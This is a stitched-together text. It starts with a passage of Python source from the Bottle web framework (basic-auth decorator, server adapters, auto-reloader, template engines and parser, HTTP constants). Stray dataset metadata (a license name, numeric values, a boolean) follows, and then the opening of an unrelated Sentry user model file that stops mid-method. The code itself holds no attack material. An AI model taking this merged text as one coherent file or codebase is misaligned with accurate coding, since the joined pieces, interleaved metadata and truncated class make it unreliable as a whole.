pathlist scriptlist = scriptlist[:shift] else: empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO' raise AssertionError("Cannot shift. Nothing left from %s" % empty) new_script_name = '/' + '/'.join(scriptlist) new_path_info = '/' + '/'.join(pathlist) if path_info.endswith('/') and pathlist: new_path_info += '/' return new_script_name, new_path_info def auth_basic(check, realm="private", text="Access denied"): """ Callback decorator to require HTTP auth (basic). TODO: Add route(check_auth=...) parameter. """ def decorator(func): @functools.wraps(func) def wrapper(*a, **ka): user, password = request.auth or (None, None) if user is None or not check(user, password): err = HTTPError(401, text) err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm) return err return func(*a, **ka) return wrapper return decorator # Shortcuts for common Bottle methods. # They all refer to the current default application. def make_default_app_wrapper(name): """ Return a callable that relays calls to the current default app. """ @functools.wraps(getattr(Bottle, name)) def wrapper(*a, **ka): return getattr(app(), name)(*a, **ka) return wrapper route = make_default_app_wrapper('route') get = make_default_app_wrapper('get') post = make_default_app_wrapper('post') put = make_default_app_wrapper('put') delete = make_default_app_wrapper('delete') patch = make_default_app_wrapper('patch') error = make_default_app_wrapper('error') mount = make_default_app_wrapper('mount') hook = make_default_app_wrapper('hook') install = make_default_app_wrapper('install') uninstall = make_default_app_wrapper('uninstall') url = make_default_app_wrapper('get_url') ############################################################################### # Server Adapter ############################################################### ############################################################################### class ServerAdapter(object): quiet = False def __init__(self, host='127.0.0.1', port=8080, **options): self.options = options self.host = host self.port = int(port) def run(self, handler): # pragma: no cover pass def __repr__(self): args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()]) return "%s(%s)" % (self.__class__.__name__, args) class CGIServer(ServerAdapter): quiet = True def run(self, handler): # pragma: no cover from wsgiref.handlers import CGIHandler def fixed_environ(environ, start_response): environ.setdefault('PATH_INFO', '') return handler(environ, start_response) CGIHandler().run(fixed_environ) class FlupFCGIServer(ServerAdapter): def run(self, handler): # pragma: no cover import flup.server.fcgi self.options.setdefault('bindAddress', (self.host, self.port)) flup.server.fcgi.WSGIServer(handler, **self.options).run() class WSGIRefServer(ServerAdapter): def run(self, app): # pragma: no cover from wsgiref.simple_server import make_server from wsgiref.simple_server import WSGIRequestHandler, WSGIServer import socket class FixedHandler(WSGIRequestHandler): def address_string(self): # Prevent reverse DNS lookups please. return self.client_address[0] def log_request(*args, **kw): if not self.quiet: return WSGIRequestHandler.log_request(*args, **kw) handler_cls = self.options.get('handler_class', FixedHandler) server_cls = self.options.get('server_class', WSGIServer) if ':' in self.host: # Fix wsgiref for IPv6 addresses. if getattr(server_cls, 'address_family') == socket.AF_INET: class server_cls(server_cls): address_family = socket.AF_INET6 self.srv = make_server(self.host, self.port, app, server_cls, handler_cls) self.port = self.srv.server_port # update port actual port (0 means random) try: self.srv.serve_forever() except KeyboardInterrupt: self.srv.server_close() # Prevent ResourceWarning: unclosed socket raise class CherryPyServer(ServerAdapter): def run(self, handler): # pragma: no cover from cherrypy import wsgiserver self.options['bind_addr'] = (self.host, self.port) self.options['wsgi_app'] = handler certfile = self.options.get('certfile') if certfile: del self.options['certfile'] keyfile = self.options.get('keyfile') if keyfile: del self.options['keyfile'] server = wsgiserver.CherryPyWSGIServer(**self.options) if certfile: server.ssl_certificate = certfile if keyfile: server.ssl_private_key = keyfile try: server.start() finally: server.stop() class WaitressServer(ServerAdapter): def run(self, handler): from waitress import serve serve(handler, host=self.host, port=self.port) class PasteServer(ServerAdapter): def run(self, handler): # pragma: no cover from paste import httpserver from paste.translogger import TransLogger handler = TransLogger(handler, setup_console_handler=(not self.quiet)) httpserver.serve(handler, host=self.host, port=str(self.port), **self.options) class MeinheldServer(ServerAdapter): def run(self, handler): from meinheld import server server.listen((self.host, self.port)) server.run(handler) class FapwsServer(ServerAdapter): """ Extremely fast webserver using libev. See http://www.fapws.org/ """ def run(self, handler): # pragma: no cover import fapws._evwsgi as evwsgi from fapws import base, config port = self.port if float(config.SERVER_IDENT[-2:]) > 0.4: # fapws3 silently changed its API in 0.5 port = str(port) evwsgi.start(self.host, port) # fapws3 never releases the GIL. Complain upstream. I tried. No luck. if 'BOTTLE_CHILD' in os.environ and not self.quiet: _stderr("WARNING: Auto-reloading does not work with Fapws3.\n") _stderr(" (Fapws3 breaks python thread support)\n") evwsgi.set_base_module(base) def app(environ, start_response): environ['wsgi.multiprocess'] = False return handler(environ, start_response) evwsgi.wsgi_cb(('', app)) evwsgi.run() class TornadoServer(ServerAdapter): """ The super hyped asynchronous server by facebook. Untested. """ def run(self, handler): # pragma: no cover import tornado.wsgi, tornado.httpserver, tornado.ioloop container = tornado.wsgi.WSGIContainer(handler) server = tornado.httpserver.HTTPServer(container) server.listen(port=self.port,address=self.host) tornado.ioloop.IOLoop.instance().start() class AppEngineServer(ServerAdapter): """ Adapter for Google App Engine. """ quiet = True def run(self, handler): from google.appengine.ext.webapp import util # A main() function in the handler script enables 'App Caching'. # Lets makes sure it is there. This _really_ improves performance. module = sys.modules.get('__main__') if module and not hasattr(module, 'main'): module.main = lambda: util.run_wsgi_app(handler) util.run_wsgi_app(handler) class TwistedServer(ServerAdapter): """ Untested. """ def run(self, handler): from twisted.web import server, wsgi from twisted.python.threadpool import ThreadPool from twisted.internet import reactor thread_pool = ThreadPool() thread_pool.start() reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop) factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler)) reactor.listenTCP(self.port, factory, interface=self.host) if not reactor.running: reactor.run() class DieselServer(ServerAdapter): """ Untested. """ def run(self, handler): from diesel.protocols.wsgi import WSGIApplication app = WSGIApplication(handler, port=self.port) app.run() class GeventServer(ServerAdapter): """ Untested. Options: * `fast` (default: False) uses libevent's http server, but has some issues: No streaming, no pipelining, no SSL. * See gevent.wsgi.WSGIServer() documentation for more options. """ def run(self, handler): from gevent import wsgi, pywsgi, local if not isinstance(threading.local(), local.local): msg = "Bottle requires gevent.monkey.patch_all() (before import)" raise RuntimeError(msg) if not self.options.pop('fast', None): wsgi = pywsgi self.options['log'] = None if self.quiet else 'default' address = (self.host, self.port) server = wsgi.WSGIServer(address, handler, **self.options) if 'BOTTLE_CHILD' in os.environ: import signal signal.signal(signal.SIGINT, lambda s, f: server.stop()) server.serve_forever() class GeventSocketIOServer(ServerAdapter): def run(self,handler): from socketio import server address = (self.host, self.port) server.SocketIOServer(address, handler, **self.options).serve_forever() class GunicornServer(ServerAdapter): """ Untested. See http://gunicorn.org/configure.html for options. """ def run(self, handler): from gunicorn.app.base import Application config = {'bind': "%s:%d" % (self.host, int(self.port))} config.update(self.options) class GunicornApplication(Application): def init(self, parser, opts, args): return config def load(self): return handler GunicornApplication().run() class EventletServer(ServerAdapter): """ Untested. Options: * `backlog` adjust the eventlet backlog parameter which is the maximum number of queued connections. Should be at least 1; the maximum value is system-dependent. * `family`: (default is 2) socket family, optional. See socket documentation for available families. """ def run(self, handler): from eventlet import wsgi, listen, patcher if not patcher.is_monkey_patched(os): msg = "Bottle requires eventlet.monkey_patch() (before import)" raise RuntimeError(msg) socket_args = {} for arg in ('backlog', 'family'): try: socket_args[arg] = self.options.pop(arg) except KeyError: pass address = (self.host, self.port) try: wsgi.server(listen(address, **socket_args), handler, log_output=(not self.quiet)) except TypeError: # Fallback, if we have old version of eventlet wsgi.server(listen(address), handler) class RocketServer(ServerAdapter): """ Untested. """ def run(self, handler): from rocket import Rocket server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler }) server.start() class BjoernServer(ServerAdapter): """ Fast server written in C: https://github.com/jonashaag/bjoern """ def run(self, handler): from bjoern import run run(handler, self.host, self.port) class AutoServer(ServerAdapter): """ Untested. """ adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer] def run(self, handler): for sa in self.adapters: try: return sa(self.host, self.port, **self.options).run(handler) except ImportError: pass server_names = { 'cgi': CGIServer, 'flup': FlupFCGIServer, 'wsgiref': WSGIRefServer, 'waitress': WaitressServer, 'cherrypy': CherryPyServer, 'paste': PasteServer, 'fapws3': FapwsServer, 'tornado': TornadoServer, 'gae': AppEngineServer, 'twisted': TwistedServer, 'diesel': DieselServer, 'meinheld': MeinheldServer, 'gunicorn': GunicornServer, 'eventlet': EventletServer, 'gevent': GeventServer, 'geventSocketIO':GeventSocketIOServer, 'rocket': RocketServer, 'bjoern' : BjoernServer, 'auto': AutoServer, } ############################################################################### # Application Control ########################################################## ############################################################################### def load(target, **namespace): """ Import a module or fetch an object from a module. * ``package.module`` returns `module` as a module object. * ``pack.mod:name`` returns the module variable `name` from `pack.mod`. * ``pack.mod:func()`` calls `pack.mod.func()` and returns the result. The last form accepts not only function calls, but any type of expression. Keyword arguments passed to this function are available as local variables. Example: ``import_string('re:compile(x)', x='[a-z]')`` """ module, target = target.split(":", 1) if ':' in target else (target, None) if module not in sys.modules: __import__(module) if not target: return sys.modules[module] if target.isalnum(): return getattr(sys.modules[module], target) package_name = module.split('.')[0] namespace[package_name] = sys.modules[package_name] return eval('%s.%s' % (module, target), namespace) def load_app(target): """ Load a bottle application from a module and make sure that the import does not affect the current default application, but returns a separate application object. See :func:`load` for the target parameter. """ global NORUN; NORUN, nr_old = True, NORUN tmp = default_app.push() # Create a new "default application" try: rv = load(target) # Import the target module return rv if callable(rv) else tmp finally: default_app.remove(tmp) # Remove the temporary added default application NORUN = nr_old _debug = debug def run(app=None, server='wsgiref', host='127.0.0.1', port=8080, interval=1, reloader=False, quiet=False, plugins=None, debug=None, **kargs): """ Start a server instance. This method blocks until the server terminates. :param app: WSGI application or target string supported by :func:`load_app`. (default: :func:`default_app`) :param server: Server adapter to use. See :data:`server_names` keys for valid names or pass a :class:`ServerAdapter` subclass. (default: `wsgiref`) :param host: Server address to bind to. Pass ``0.0.0.0`` to listens on all interfaces including the external one. (default: 127.0.0.1) :param port: Server port to bind to. Values below 1024 require root privileges. (default: 8080) :param reloader: Start auto-reloading server? (default: False) :param interval: Auto-reloader interval in seconds (default: 1) :param quiet: Suppress output to stdout and stderr? (default: False) :param options: Options passed to the server adapter. """ if NORUN: return if reloader and not os.environ.get('BOTTLE_CHILD'): lockfile = None try: fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock') os.close(fd) # We only need this file to exist. We never write to it while os.path.exists(lockfile): args = [sys.executable] + sys.argv environ = os.environ.copy() environ['BOTTLE_CHILD'] = 'true' environ['BOTTLE_LOCKFILE'] = lockfile p = subprocess.Popen(args, env=environ) while p.poll() is None: # Busy wait... os.utime(lockfile, None) # I am alive! time.sleep(interval) if p.poll() != 3: if os.path.exists(lockfile): os.unlink(lockfile) sys.exit(p.poll()) except KeyboardInterrupt: pass finally: if os.path.exists(lockfile): os.unlink(lockfile) return try: if debug is not None: _debug(debug) app = app or default_app() if isinstance(app, basestring): app = load_app(app) if not callable(app): raise ValueError("Application is not callable: %r" % app) for plugin in plugins or []: if isinstance(plugin, basestring): plugin = load(plugin) app.install(plugin) if server in server_names: server = server_names.get(server) if isinstance(server, basestring): server = load(server) if isinstance(server, type): server = server(host=host, port=port, **kargs) if not isinstance(server, ServerAdapter): raise ValueError("Unknown or unsupported server: %r" % server) server.quiet = server.quiet or quiet if not server.quiet: _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server))) _stderr("Listening on http://%s:%d/\n" % (server.host, server.port)) _stderr("Hit Ctrl-C to quit.\n\n") if reloader: lockfile = os.environ.get('BOTTLE_LOCKFILE') bgcheck = FileCheckerThread(lockfile, interval) with bgcheck: server.run(app) if bgcheck.status == 'reload': sys.exit(3) else: server.run(app) except KeyboardInterrupt: pass except (SystemExit, MemoryError): raise except: if not reloader: raise if not getattr(server, 'quiet', quiet): print_exc() time.sleep(interval) sys.exit(3) class FileCheckerThread(threading.Thread): """ Interrupt main-thread as soon as a changed module file is detected, the lockfile gets deleted or gets to old. """ def __init__(self, lockfile, interval): threading.Thread.__init__(self) self.daemon = True self.lockfile, self.interval = lockfile, interval #: Is one of 'reload', 'error' or 'exit' self.status = None def run(self): exists = os.path.exists mtime = lambda p: os.stat(p).st_mtime files = dict() for module in list(sys.modules.values()): path = getattr(module, '__file__', '') if path[-4:] in ('.pyo', '.pyc'): path = path[:-1] if path and exists(path): files[path] = mtime(path) while not self.status: if not exists(self.lockfile)\ or mtime(self.lockfile) < time.time() - self.interval - 5: self.status = 'error' thread.interrupt_main() for path, lmtime in list(files.items()): if not exists(path) or mtime(path) > lmtime: self.status = 'reload' thread.interrupt_main() break time.sleep(self.interval) def __enter__(self): self.start() def __exit__(self, exc_type, *_): if not self.status: self.status = 'exit' # silent exit self.join() return exc_type is not None and issubclass(exc_type, KeyboardInterrupt) ############################################################################### # Template Adapters ############################################################ ############################################################################### class TemplateError(HTTPError): def __init__(self, message): HTTPError.__init__(self, 500, message) class BaseTemplate(object): """ Base class and minimal API for template adapters """ extensions = ['tpl','html','thtml','stpl'] settings = {} #used in prepare() defaults = {} #used in render() def __init__(self, source=None, name=None, lookup=None, encoding='utf8', **settings): """ Create a new template. If the source parameter (str or buffer) is missing, the name argument is used to guess a template filename. Subclasses can assume that self.source and/or self.filename are set. Both are strings. The lookup, encoding and settings parameters are stored as instance variables. The lookup parameter stores a list containing directory paths. The encoding parameter should be used to decode byte strings or files. The settings parameter contains a dict for engine-specific settings. """ self.name = name self.source = source.read() if hasattr(source, 'read') else source self.filename = source.filename if hasattr(source, 'filename') else None self.lookup = [os.path.abspath(x) for x in lookup] if lookup else [] self.encoding = encoding self.settings = self.settings.copy() # Copy from class variable self.settings.update(settings) # Apply if not self.source and self.name: self.filename = self.search(self.name, self.lookup) if not self.filename: raise TemplateError('Template %s not found.' % repr(name)) if not self.source and not self.filename: raise TemplateError('No template specified.') self.prepare(**self.settings) @classmethod def search(cls, name, lookup=None): """ Search name in all directories specified in lookup. First without, then with common extensions. Return first hit. """ if not lookup: depr('The template lookup path list should not be empty.', True) #0.12 lookup = ['.'] if os.path.isabs(name) and os.path.isfile(name): depr('Absolute template path names are deprecated.', True) #0.12 return os.path.abspath(name) for spath in lookup: spath = os.path.abspath(spath) + os.sep fname = os.path.abspath(os.path.join(spath, name)) if not fname.startswith(spath): continue if os.path.isfile(fname): return fname for ext in cls.extensions: if os.path.isfile('%s.%s' % (fname, ext)): return '%s.%s' % (fname, ext) @classmethod def global_config(cls, key, *args): """ This reads or sets the global settings stored in class.settings. """ if args: cls.settings = cls.settings.copy() # Make settings local to class cls.settings[key] = args[0] else: return cls.settings[key] def prepare(self, **options): """ Run preparations (parsing, caching, ...). It should be possible to call this again to refresh a template or to update settings. """ raise NotImplementedError def render(self, *args, **kwargs): """ Render the template with the specified local variables and return a single byte or unicode string. If it is a byte string, the encoding must match self.encoding. This method must be thread-safe! Local variables may be provided in dictionaries (args) or directly, as keywords (kwargs). """ raise NotImplementedError class MakoTemplate(BaseTemplate): def prepare(self, **options): from mako.template import Template from mako.lookup import TemplateLookup options.update({'input_encoding':self.encoding}) options.setdefault('format_exceptions', bool(DEBUG)) lookup = TemplateLookup(directories=self.lookup, **options) if self.source: self.tpl = Template(self.source, lookup=lookup, **options) else: self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options) def render(self, *args, **kwargs): for dictarg in args: kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) class CheetahTemplate(BaseTemplate): def prepare(self, **options): from Cheetah.Template import Template self.context = threading.local() self.context.vars = {} options['searchList'] = [self.context.vars] if self.source: self.tpl = Template(source=self.source, **options) else: self.tpl = Template(file=self.filename, **options) def render(self, *args, **kwargs): for dictarg in args: kwargs.update(dictarg) self.context.vars.update(self.defaults) self.context.vars.update(kwargs) out = str(self.tpl) self.context.vars.clear() return out class Jinja2Template(BaseTemplate): def prepare(self, filters=None, tests=None, globals={}, **kwargs): from jinja2 import Environment, FunctionLoader self.env = Environment(loader=FunctionLoader(self.loader), **kwargs) if filters: self.env.filters.update(filters) if tests: self.env.tests.update(tests) if globals: self.env.globals.update(globals) if self.source: self.tpl = self.env.from_string(self.source) else: self.tpl = self.env.get_template(self.filename) def render(self, *args, **kwargs): for dictarg in args: kwargs.update(dictarg) _defaults = self.defaults.copy() _defaults.update(kwargs) return self.tpl.render(**_defaults) def loader(self, name): fname = self.search(name, self.lookup) if not fname: return with open(fname, "rb") as f: return f.read().decode(self.encoding) class SimpleTemplate(BaseTemplate): def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka): self.cache = {} enc = self.encoding self._str = lambda x: touni(x, enc) self._escape = lambda x: escape_func(touni(x, enc)) self.syntax = syntax if noescape: self._str, self._escape = self._escape, self._str @cached_property def co(self): return compile(self.code, self.filename or '<string>', 'exec') @cached_property def code(self): source = self.source if not source: with open(self.filename, 'rb') as f: source = f.read() try: source, encoding = touni(source), 'utf8' except UnicodeError: depr('Template encodings other than utf8 are no longer supported.') #0.11 source, encoding = touni(source, 'latin1'), 'latin1' parser = StplParser(source, encoding=encoding, syntax=self.syntax) code = parser.translate() self.encoding = parser.encoding return code def _rebase(self, _env, _name=None, **kwargs): _env['_rebase'] = (_name, kwargs) def _include(self, _env, _name=None, **kwargs): env = _env.copy() env.update(kwargs) if _name not in self.cache: self.cache[_name] = self.__class__(name=_name, lookup=self.lookup) return self.cache[_name].execute(env['_stdout'], env) def execute(self, _stdout, kwargs): env = self.defaults.copy() env.update(kwargs) env.update({'_stdout': _stdout, '_printlist': _stdout.extend, 'include': functools.partial(self._include, env), 'rebase': functools.partial(self._rebase, env), '_rebase': None, '_str': self._str, '_escape': self._escape, 'get': env.get, 'setdefault': env.setdefault, 'defined': env.__contains__ }) eval(self.co, env) if env.get('_rebase'): subtpl, rargs = env.pop('_rebase') rargs['base'] = ''.join(_stdout) #copy stdout del _stdout[:] # clear stdout return self._include(env, subtpl, **rargs) return env def render(self, *args, **kwargs): """ Render the template using keyword arguments as local variables. """ env = {}; stdout = [] for dictarg in args: env.update(dictarg) env.update(kwargs) self.execute(stdout, env) return ''.join(stdout) class StplSyntaxError(TemplateError): pass class StplParser(object): """ Parser for stpl templates. """ _re_cache = {} #: Cache for compiled re patterns # This huge pile of voodoo magic splits python code into 8 different tokens. # 1: All kinds of python strings (trust me, it works) _re_tok = '((?m)[urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \ '|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \ '|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \ '|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))' _re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later # 2: Comments (until end of line, but not the newline itself) _re_tok += '|(#.*)' # 3,4: Keywords that start or continue a python block (only start of line) _re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \ '|^([ \\t]*(?:elif|else|except|finally)\\b)' # 5: Our special 'end' keyword (but only if it stands alone) _re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))' # 6: A customizable end-of-code-block template token (only end of line) _re_tok += '|(%(block_close)s[ \\t]*(?=$))' # 7: And finally, a single newline. The 8th token is 'everything else' _re_tok += '|(\\r?\\n)' # Match the start tokens of code areas in a template _re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))' # Match inline statements (may contain python strings) _re_inl = '%%(inline_start)s((?:%s|[^\'"\n]+?)*?)%%(inline_end)s' % _re_inl default_syntax = '<% %> % {{ }}' def __init__(self, source, syntax=None, encoding='utf8'): self.source, self.encoding = touni(source, encoding), encoding self.set_syntax(syntax or self.default_syntax) self.code_buffer, self.text_buffer = [], [] self.lineno, self.offset = 1, 0 self.indent, self.indent_mod = 0, 0 def get_syntax(self): """ Tokens as a space separated string (default: <% %> % {{ }}) """ return self._syntax def set_syntax(self, syntax): self._syntax = syntax self._tokens = syntax.split() if not syntax in self._re_cache: names = 'block_start block_close line_start inline_start inline_end' etokens = map(re.escape, self._tokens) pattern_vars = dict(zip(names.split(), etokens)) patterns = (self._re_split, self._re_tok, self._re_inl) patterns = [re.compile(p%pattern_vars) for p in patterns] self._re_cache[syntax] = patterns self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax] syntax = property(get_syntax, set_syntax) def translate(self): if self.offset: raise RuntimeError('Parser is a one time instance.') while True: m = self.re_split.search(self.source[self.offset:]) if m: text = self.source[self.offset:self.offset+m.start()] self.text_buffer.append(text) offs = self.offset self.offset += m.end() if m.group(1): # Escape syntax line, sep, _ = self.source[self.offset:].partition('\n') self.text_buffer.append(self.source[offs+m.start():offs+m.start(1)]+m.group(2)+line+sep) self.offset += len(line+sep) continue self.flush_text() self.read_code(multiline=bool(m.group(4))) else: break self.text_buffer.append(self.source[self.offset:]) self.flush_text() return ''.join(self.code_buffer) def read_code(self, multiline): code_line, comment = '', '' while True: m = self.re_tok.search(self.source[self.offset:]) if not m: code_line += self.source[self.offset:] self.offset = len(self.source) self.write_code(code_line.strip(), comment) return code_line += self.source[self.offset:self.offset+m.start()] self.offset += m.end() _str, _com, _blk1, _blk2, _end, _cend, _nl = m.groups() if code_line and (_blk1 or _blk2): # a if b else c code_line += _blk1 or _blk2 continue if _str: # Python string code_line += _str elif _com: # Python comment (up to EOL) comment = _com if multiline and _com.strip().endswith(self._tokens[1]): multiline = False # Allow end-of-block in comments elif _blk1: # Start-block keyword (if/for/while/def/try/...) code_line, self.indent_mod = _blk1, -1 self.indent += 1 elif _blk2: # Continue-block keyword (else/elif/except/...) code_line, self.indent_mod = _blk2, -1 elif _end: # The non-standard 'end'-keyword (ends a block) self.indent -= 1 elif _cend: # The end-code-block template token (usually '%>') if multiline: multiline = False else: code_line += _cend else: # \n self.write_code(code_line.strip(), comment) self.lineno += 1 code_line, comment, self.indent_mod = '', '', 0 if not multiline: break def flush_text(self): text = ''.join(self.text_buffer) del self.text_buffer[:] if not text: return parts, pos, nl = [], 0, '\\\n'+' '*self.indent for m in self.re_inl.finditer(text): prefix, pos = text[pos:m.start()], m.end() if prefix: parts.append(nl.join(map(repr, prefix.splitlines(True)))) if prefix.endswith('\n'): parts[-1] += nl parts.append(self.process_inline(m.group(1).strip())) if pos < len(text): prefix = text[pos:] lines = prefix.splitlines(True) if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3] elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4] parts.append(nl.join(map(repr, lines))) code = '_printlist((%s,))' % ', '.join(parts) self.lineno += code.count('\n')+1 self.write_code(code) @staticmethod def process_inline(chunk): if chunk[0] == '!': return '_str(%s)' % chunk[1:] return '_escape(%s)' % chunk def write_code(self, line, comment=''): code = ' ' * (self.indent+self.indent_mod) code += line.lstrip() + comment + '\n' self.code_buffer.append(code) def template(*args, **kwargs): """ Get a rendered template as a string iterator. You can use a name, a filename or a template string as first parameter. Template rendering arguments can be passed as dictionaries or directly (as keyword arguments). """ tpl = args[0] if args else None adapter = kwargs.pop('template_adapter', SimpleTemplate) lookup = kwargs.pop('template_lookup', TEMPLATE_PATH) tplid = (id(lookup), tpl) if tplid not in TEMPLATES or DEBUG: settings = kwargs.pop('template_settings', {}) if isinstance(tpl, adapter): TEMPLATES[tplid] = tpl if settings: TEMPLATES[tplid].prepare(**settings) elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl: TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings) else: TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings) if not TEMPLATES[tplid]: abort(500, 'Template (%s) not found' % tpl) for dictarg in args[1:]: kwargs.update(dictarg) return TEMPLATES[tplid].render(kwargs) mako_template = functools.partial(template, template_adapter=MakoTemplate) cheetah_template = functools.partial(template, template_adapter=CheetahTemplate) jinja2_template = functools.partial(template, template_adapter=Jinja2Template) def view(tpl_name, **defaults): """ Decorator: renders a template for a handler. The handler can control its behavior like that: - return a dict of template vars to fill out the template - return something other than a dict and the view decorator will not process the template, but return the handler result as is. This includes returning a HTTPResponse(dict) to get, for instance, JSON with autojson or other castfilters. """ def decorator(func): @functools.wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) if isinstance(result, (dict, DictMixin)): tplvars = defaults.copy() tplvars.update(result) return template(tpl_name, **tplvars) elif result is None: return template(tpl_name, defaults) return result return wrapper return decorator mako_view = functools.partial(view, template_adapter=MakoTemplate) cheetah_view = functools.partial(view, template_adapter=CheetahTemplate) jinja2_view = functools.partial(view, template_adapter=Jinja2Template) ############################################################################### # Constants and Globals ######################################################## ############################################################################### TEMPLATE_PATH = ['./', './views/'] TEMPLATES = {} DEBUG = False NORUN = False # If set, run() does nothing. Used by load_app() #: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found') HTTP_CODES = httplib.responses HTTP_CODES[418] = "I'm a teapot" # RFC 2324 HTTP_CODES[428] = "Precondition Required" HTTP_CODES[429] = "Too Many Requests" HTTP_CODES[431] = "Request Header Fields Too Large" HTTP_CODES[511] = "Network Authentication Required" _HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items()) #: The default template used for error pages. Override with @error() ERROR_PAGE_TEMPLATE = """ %%try: %%from %s import DEBUG, request <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: {{e.status}}</title> <style type="text/css"> html {background-color: #eee; font-family: sans-serif;} body {background-color: #fff; border: 1px solid #ddd; padding: 15px; margin: 15px;} pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;} </style> </head> <body> <h1>Error: {{e.status}}</h1> <p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt> caused an error:</p> <pre>{{e.body}}</pre> %%if DEBUG and e.exception: <h2>Exception:</h2> <pre>{{repr(e.exception)}}</pre> %%end %%if DEBUG and e.traceback: <h2>Traceback:</h2> <pre>{{e.traceback}}</pre> %%end </body> </html> %%except ImportError: <b>ImportError:</b> Could not generate the error page. Please add bottle to the import path. %%end """ % __name__ #: A thread-safe instance of :class:`LocalRequest`. If accessed from within a #: request callback, this instance always refers to the *current* request #: (even on a multithreaded server). request = LocalRequest() #: A thread-safe instance of :class:`LocalResponse`. It is used to change the #: HTTP response for the *current* request. response = LocalResponse() #: A thread-safe namespace. Not used by Bottle. local = threading.local() # Initialize app stack (create first empty Bottle app) # BC: 0.6.4 and needed for run() app = default_app = AppStack() app.push() #: A virtual package that redirects import statements. #: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`. ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module if __name__ == '__main__': opt, args, parser = _cmd_options, _cmd_args, _cmd_parser if opt.version: _stdout('Bottle %s\n'%__version__) sys.exit(0) if not args: parser.print_help() _stderr('\nError: No application entry point specified.\n') sys.exit(1) sys.path.insert(0, '.') sys.modules.setdefault('bottle', sys.modules['__main__']) host, port = (opt.bind or 'localhost'), 8080 if ':' in host and host.rfind(']') < host.rfind(':'): host, port = host.rsplit(':', 1) host = host.strip('[]') run(args[0], host=host, port=int(port), server=opt.server, reloader=opt.reload, plugins=opt.plugin, debug=opt.debug) # THE END
mit
-874,936,976,201,851,400
38.50483
108
0.566328
false
ifduyue/sentry
src/sentry/models/user.py
1
10584
""" sentry.models.user ~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import import logging import warnings from bitfield import BitField from django.contrib.auth.models import AbstractBaseUser, UserManager from django.core.urlresolvers import reverse from django.db import IntegrityError, models, transaction from django.utils import timezone from django.utils.translation import ugettext_lazy as _ from sentry.db.models import BaseManager, BaseModel, BoundedAutoField from sentry.models import LostPasswordHash from sentry.utils.http import absolute_uri audit_logger = logging.getLogger('sentry.audit.user') class UserManager(BaseManager, UserManager): pass class User(BaseModel, AbstractBaseUser): __core__ = True id = BoundedAutoField(primary_key=True) username = models.CharField(_('username'), max_length=128, unique=True) # this column is called first_name for legacy reasons, but it is the entire # display name name = models.CharField(_('name'), max_length=200, blank=True, db_column='first_name') email = models.EmailField(_('email address'), blank=True) is_staff = models.BooleanField( _('staff status'), default=False, help_text=_('Designates whether the user can log into this admin ' 'site.') ) is_active = models.BooleanField( _('active'), default=True, help_text=_( 'Designates whether this user should be treated as ' 'active. Unselect this instead of deleting accounts.' ) ) is_superuser = models.BooleanField( _('superuser status'), default=False, help_text=_( 'Designates that this user has all permissions without ' 'explicitly assigning them.' ) ) is_managed = models.BooleanField( _('managed'), default=False, help_text=_( 'Designates whether this user should be treated as ' 'managed. Select this to disallow the user from ' 'modifying their account (username, password, etc).' ) ) is_sentry_app = models.NullBooleanField( _('is sentry app'), null=True, default=None, help_text=_( 'Designates whether this user is the entity used for Permissions' 'on behalf of a Sentry App. Cannot login or use Sentry like a' 'normal User would.' ) ) is_password_expired = models.BooleanField( _('password expired'), default=False, help_text=_( 'If set to true then the user needs to change the ' 'password on next sign in.' ) ) last_password_change = models.DateTimeField( _('date of last password change'), null=True, help_text=_('The date the password was changed last.') ) flags = BitField( flags=( ( 'newsletter_consent_prompt', 'Do we need to ask this user for newsletter consent?' ), ), default=0, null=True, ) session_nonce = models.CharField(max_length=12, null=True) date_joined = models.DateTimeField(_('date joined'), default=timezone.now) last_active = models.DateTimeField(_('last active'), default=timezone.now, null=True) objects = UserManager(cache_fields=['pk']) USERNAME_FIELD = 'username' REQUIRED_FIELDS = ['email'] class Meta: app_label = 'sentry' db_table = 'auth_user' verbose_name = _('user') verbose_name_plural = _('users') def delete(self): if self.username == 'sentry': raise Exception('You cannot delete the "sentry" user as it is required by Sentry.') avatar = self.avatar.first() if avatar: avatar.delete() return 